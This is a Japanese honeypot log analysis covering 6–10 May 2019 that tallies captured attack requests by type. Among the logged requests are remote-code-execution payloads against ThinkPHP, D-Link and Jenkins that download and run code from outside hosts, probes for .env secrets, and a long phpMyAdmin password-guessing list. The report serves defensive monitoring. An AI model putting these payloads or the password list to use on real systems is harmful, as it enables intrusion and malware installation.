BW-Potのログ分析 (2019/05/06-2019/05/10)

期間内の総アクセス件数は1,100件です。送信元IP数は328IPです。

脆弱性に関する新規通信をいくつか確認しました

TBK Vision DVR デバイスの脆弱性(CVE-2018-9995)に関する攻撃

管理者パスワードを窃取される脆弱性の模様

GET	/device.rsp?opt=user&cmd=list

IPカメラ、DVR（録画機）の脆弱性（セキュリティ）チェック方法2 - 零細メイカー代継の挑戦日記（プログラム、IoT、中国ネタ多め）
NVD - CVE-2018-9995

Zivif Web カメラの脆弱性(CVE-2017-17106)に関する攻撃

管理者パスワードを窃取される脆弱性の模様

GET	/web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr

NVD - CVE-2017-17106

Jenkinsのプラグインの脆弱性(CVE-2019-1003000)に関する攻撃

RCEの脆弱性

GET	/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27LFZQExtWuxjVTXjsqGnebQq%27,%20root=%27hxxp://185.162.235[.]211%27)%0a@Grab(group=%27package%27,%20module=%27LFZQExtWuxjVTXjsqGnebQq%27,%20version=%271%27)%0aimport%20LFZQExtWuxjVTXjsqGnebQq;

NVD - CVE-2019-1003000
GitHub - l3m0n/jenkins_unauthenticated_remote_code_execution: Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)

今までの分析メモ、シグネチャは以下にあります。
https://drive.google.com/file/d/1nbYekj_mXHieZhLrJb_NtfQtAHkFcX_i/view

件数	種別	リクエスト
251	アクセス	GET /
239	Tomcat管理ページへのブルートフォース攻撃	GET /manager/html
109	Bad Request
61	WordPressに対するブルートフォース攻撃	POST /wp-login.php
58	WordPressに関する調査	GET /wp-login.php
56	WordPress、XML-RPCに関する攻撃	POST /xmlrpc.php
50	phpMyAdminに関する調査	GET /pma/
34	phpMyAdminに対するブルートフォース攻撃	POST /pma/index.php
9	不正中継の調査	GET api.binance[.]com/api/v1/time
9	クローリング	HEAD /robots.txt
8	不正中継の調査	GET api.ipify[.]org/
5	不正中継の調査	GET www.baidu[.]com/
4	クローリング	GET /robots.txt
4	環境設定の調査	GET /api/.env
3	ZmEuによるスキャン	GET /w00tw00t.at.blackhats.romanian.anti-sec:)
3	ZmEuによるスキャン phpMyAdminに関する調査	GET /phpMyAdmin/scripts/setup.php
3	ZmEuによるスキャン phpMyAdminに関する調査	GET /phpmyadmin/scripts/setup.php
2	不正中継の調査	GET /esps/admin/main.jspx
2	不正中継の調査	GET /index.php
2	D-Link デバイスの脆弱性に対する攻撃	GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://194.147.32[.]131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
2	TBK Vision DVR デバイスの脆弱性(CVE-2018-9995)に関する攻撃	GET /device.rsp?opt=user&cmd=list
2	ThinkPHPに対する攻撃	GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2	ThinkPHPに対する攻撃	POST /TP/public/index.php?s=captcha
2	ThinkPHPに関する調査	GET /TP/public/index.php
2	Tomato RAFに関する調査	GET /admin-scripts.asp
2	WebLogic に関する調査	GET /console/login/LoginForm.jsp
2	ZmEuによるスキャン phpMyAdminに関する調査	GET /phpmy/scripts/setup.php
2	ZmEuによるスキャン phpMyAdminに関する調査	GET /pma/scripts/setup.php
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=dbs&pma_password=dbs
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=12345
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2012
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=bitcoin
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dollars
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=files
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass1234
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qazwsx
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root1234
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=test
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=shopdb&pma_password=shopdb
2	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=web&pma_password=web
2	アクセス	HEAD /
2	環境設定の調査	GET /.env
1	不明	GET /acadmin.php
1	不明	GET /qzone/
1	不正中継の調査	GET 110.249.212.46/testget?q=23333&port=80
1	不明	GET 80/
1	不正中継の調査	GET wujieliulan[.]com/
1	不正中継の調査	GET www.123cha[.]com/
1	不正中継の調査	GET www.bing[.]com/
1	不正中継の調査	GET www.boxun[.]com/
1	不正中継の調査	GET www.epochtimes[.]com/
1	不正中継の調査	GET www.minghui[.]org/
1	不正中継の調査	HEAD 112.124.42[.]80/
1	不正中継の調査	HEAD 123.125.114[.]144/
1	D-Link デバイスに関する調査	GET /HNAP1
1	D-Link デバイスに関する調査	GET /HNAP1/
1	Jenkinsのプラグインの脆弱性(CVE-2019-1003000)に関する攻撃	GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27LFZQExtWuxjVTXjsqGnebQq%27,%20root=%27hxxp://185.162.235[.]211%27)%0a@Grab(group=%27package%27,%20module=%27LFZQExtWuxjVTXjsqGnebQq%27,%20version=%271%27)%0aimport%20LFZQExtWuxjVTXjsqGnebQq;
1	NMAPによるスキャン	GET /Nmap/folder/check1557366571
1	NMAPによるスキャン	GET /NmapUpperCheck1557366571
1	NMAPによるスキャン	GET /evox/about
1	NMAPによるスキャン	GET /nmaplowercheck1557366571
1	NMAPによるスキャン	POST /sdk
1	Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃	POST /users?page=&size=5
1	ThinkPHPに対する攻撃	GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php
1	ThinkPHPに対する攻撃	GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mvipsuiimigfgck28391.exe');start%20C:/Windows/temp/mvipsuiimigfgck28391.exe
1	ThinkPHPに対する攻撃	GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mvipsuiimigfgck28391.exe');start%20C:/Windows/temp/mvipsuiimigfgck28391.exe
1	WordPressに関する調査	GET /1/wp-login.php
1	WordPressに関する調査	GET /2/wp-login.php
1	WordPressに関する調査	GET /3/wp-login.php
1	WordPressに関する調査	GET /wordpress/wp-login.php
1	WordPressに関する調査	GET /wp/wp-login.php
1	WordPressのユーザー情報の取得	GET ///?author=1
1	WordPressのユーザー情報の取得	GET ///wp-json/wp/v2/users/
1	WordPressのユーザー情報の取得	GET /wp-json/wp/v2/users/
1	Zivif Web カメラの脆弱性(CVE-2017-17106)に関する攻撃	GET /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=123
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=pass
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=blog&pma_password=blog
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=db&pma_password=db
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=joomla&pma_password=joomla
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=money&pma_password=money
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=nginx&pma_password=nginx
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=pma&pma_password=pma
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=popa3d&pma_password=popa3d
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123123
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567890
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweasdzxc
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=12qwaszx
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2010
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2011
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2014
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2015
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2016
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2019
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2020
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=4321
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=54321
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=654321
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=666666
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=NAS
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=Password1
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=ROOT
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=a123456
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=acces
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=acceso
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=access123
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=admin123
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=administrator
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backup
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdb
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backups
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=charlie
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=confidential
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=crypto
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=database
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=databases
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=db
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=developer
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dragon
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=football
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=freedom
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=gameserver
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=hello
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=iloveyou
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=linux
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=login
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=master
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=michael
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=monkey
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=mysql
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=oracle
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=p455w0rd
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass123
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass2018
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass2019
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passw0rd
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password1
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password2019
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password321
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passwords
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=queen
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qwerty
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qwerty123
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=r00t
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rock
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rootadmin
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=senha
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=server
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=solo
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=sqlaccess
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=test123
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=toor
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=trustno1
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=unix
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=users
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webadmin
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webmaster
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webs
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=whatever
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=windows
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=wordpres
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=xampp
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=shop&pma_password=shop
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=sql&pma_password=sql
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=wordpress
1	phpMyAdminに対するブルートフォース攻撃	GET /phpmyadmin/index.php?lang=en&pma_username=wp&pma_password=wp
1	phpMyAdminに関する調査	GET /index.php?lang=en
1	phpMyAdminに関する調査	GET /mysql/admin/index.php?lang=en
1	phpMyAdminに関する調査	GET /mysql/dbadmin/index.php?lang=en
1	phpMyAdminに関する調査	GET /mysql/mysqlmanager/index.php?lang=en
1	phpMyAdminに関する調査	GET /mysql/sqlmanager/index.php?lang=en
1	phpMyAdminに関する調査	GET /phpmyadmin
1	phpMyAdminに関する調査	GET /phpmyadmin/index.php?lang=en
1	環境設定の調査	GET /admin/.env
1	環境設定の調査	GET /backup/.env
1	環境設定の調査	GET /dev/.env
1	環境設定の調査	GET /developer/.env
1	環境設定の調査	GET /m/.env
1	環境設定の調査	GET /mobile/.env
1	環境設定の調査	GET /portal/.env
1	環境設定の調査	GET /public/.env
1	環境設定の調査	GET /web/.env